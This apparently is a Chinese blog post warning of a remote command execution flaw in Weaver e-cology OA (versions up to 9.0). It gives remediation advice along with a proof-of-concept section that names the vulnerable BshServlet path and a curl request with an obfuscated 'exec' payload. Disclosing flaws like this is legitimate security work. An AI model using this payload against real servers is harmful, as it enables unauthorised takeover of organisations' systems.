【漏洞预警】泛微OA系统weaver e-cology多版本存在命令执行漏洞

  • 内容
  • 相关

0x01漏洞描述

泛微OA办公系统是一款协调办公软件。

泛微协同商务软件系统多版本存在命令执行漏洞,攻击者可利用该漏洞获取服务器权限。

0x02漏洞危害

攻击者可以通过精心构造的请求包在受影响版本的泛微OA上进行远程代码执行。

0x03影响范围

泛微 e-cology<=9.0

0x04漏洞复现

访问 http://url/weaver/bsh.servlet.BshServlet 输入 payload 如下:

Image

Image

Image

0x05poc

漏洞路径:/weaver/bsh.servlet.BshServlet

exec("whoami")

curl http://xx.xx.xx.xx.xx/weaver/bsh.servlet.BshServlet/ -d 'bsh.script=ev

al%00("ex"%2b"ec(\"whoami\")");&bsh.servlet.captureOutErr=true&bsh.servlet.outp ut=raw'

0x06修复方案

1、屏蔽/weaver/*目录的访问;

2、https://www.weaver.com.cn/cs/securityDownload.asp

本文标签:

版权声明:若无特殊注明,本文皆为《舜哥哥吖》原创,转载请保留文章出处。

本文链接:【漏洞预警】泛微OA系统weaver e-cology多版本存在命令执行漏洞 - http://www.shungg.cn/post/252

发表评论

电子邮件地址不会被公开。 必填项已用*标注